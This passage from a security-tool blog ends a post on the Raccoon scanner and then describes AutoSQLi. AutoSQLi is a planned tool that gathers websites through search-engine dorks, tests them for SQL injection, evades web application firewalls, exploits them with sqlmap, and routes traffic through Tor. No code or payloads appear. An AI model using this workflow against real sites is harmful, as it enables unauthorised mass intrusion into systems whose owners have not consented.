<a href="https://3.bp.blogspot.com/-VsbHYFAf_GA/W2E_1hW1bbI/AAAAAAAAMBI/4OQ9k3sI_lYfnBGY3cCRD8cVnUYb8secACLcBGAs/s1600/Raccoon_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="726" height="364" src="https://3.bp.blogspot.com/-VsbHYFAf_GA/W2E_1hW1bbI/AAAAAAAAMBI/4OQ9k3sI_lYfnBGY3cCRD8cVnUYb8secACLcBGAs/s640/Raccoon_7.png" width="640" /></a></div>
<br />
<strong>Results folder tree after a scan:</strong><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Uq7MNwxGu6w/W2E_6xw6NvI/AAAAAAAAMBM/YQQAm3LRxMw5tERYA65Czy0KkDYtAvf2wCLcBGAs/s1600/Raccoon_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="277" data-original-width="205" src="https://3.bp.blogspot.com/-Uq7MNwxGu6w/W2E_6xw6NvI/AAAAAAAAMBM/YQQAm3LRxMw5tERYA65Czy0KkDYtAvf2wCLcBGAs/s1600/Raccoon_8.png" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/evyatarmeged/Raccoon" rel="nofollow" target="_blank">Download Raccoon</a></span></b></div>
<span style="font-size: large;"><b>AutoSQLi - An Automatic SQL Injection Tool Which Takes Advantage Of Googler, Ddgr, WhatWaf And SQLMap</b></span> (published 2018-06-07)<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-sEKuhlc4xVg/WxBE0Ox1OUI/AAAAAAAALXI/zHwK91zu13szqqo4GwOz0Icojy8bjZFlwCLcBGAs/s1600/AutoSQLi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="345" data-original-width="657" height="336" src="https://3.bp.blogspot.com/-sEKuhlc4xVg/WxBE0Ox1OUI/AAAAAAAALXI/zHwK91zu13szqqo4GwOz0Icojy8bjZFlwCLcBGAs/s640/AutoSQLi.png" width="640" /></a></div>
<br />
An Automatic SQL Injection Tool Which Takes Advantage Of <del>DorkNet</del> Googler, Ddgr, WhatWaf And Sqlmap.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Features</b></span><br />
<ul>
<li>Save System - there is a complete save system, which can resume even after your PC crashes. - technology is cool</li>
<li>Dorking - from the <a href="http://www.kitploit.com/search/label/Command%20Line">command line</a> (one dork): YES - from a file: NO - from an interactive wizard: YES</li>
<li>Waffing - Thanks to <a href="https://github.com/Ekultek" rel="nofollow" target="_blank">Ekultek</a>, <a href="http://www.kitploit.com/search/label/WhatWaf">WhatWaf</a> now has a JSON output function. - So it's mostly finished :) - UPDATE: WhatWaf is completely working with AutoSQLi. Sqlmap is the next big step</li>
<li>Sqlmapping - I'll look into whether there is some sort of sqlmap API, because I don't wanna use <code>execute</code> this time (: - Sqlmap is cool</li>
<li>REPORTING: YES</li>
<li>Rest API: NOPE</li>
</ul>
<br />
<span style="font-size: large;"><b>TODO:</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Log handling (logging with different levels, cleanly)</li>
<li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Translate output (option to translate the save, which is in pickle format, to a json/csv save)</li>
<li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Spellcheck (correct wrongly spelled words and conjugational errors. I'm on Neovim right now and there is no auto-spelling check)</li>
</ul>
<br />
<span style="font-size: large;"><b>The Plan</b></span><br />
This plan is a bit outdated, but the tool will follow this idea:<br />
<ol>
<li>AutoSQLi will be a Python application which, using a dork provided by the user, automatically returns a list of websites <a href="http://www.kitploit.com/search/label/Vulnerable">vulnerable</a> to SQL injection.</li>
<li>To find vulnerable websites, the user first provides a dork (see <a href="https://www.techopedia.com/definition/30938/google-dorking" rel="nofollow" target="_blank">Google dorking</a>), which is passed to findDorks.py, which returns a list of URLs matching it.</li>
<li>Then, AutoSQLi will do some very basic checks (TODO: maybe using sqlmap and its --smart and --batch functions) to verify whether the application is protected by a WAF, or whether one of its parameters is vulnerable.</li>
<li>Sometimes, websites are protected by a Web Application Firewall, or in short, a WAF. To identify and get around these WAFs, AutoSQLi will use WhatWaf.</li>
<li>Finally, AutoSQLi will exploit the website using sqlmap, and give the user the choice to do whatever they want!</li>
</ol>
<br />
<b>Tor</b><br />
Also, AutoSQLi should work over Tor by default, so it should check for Tor availability on startup.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/jesuiscamille/AutoSQLi" rel="nofollow" target="_blank">Download AutoSQLi</a></span></b></div>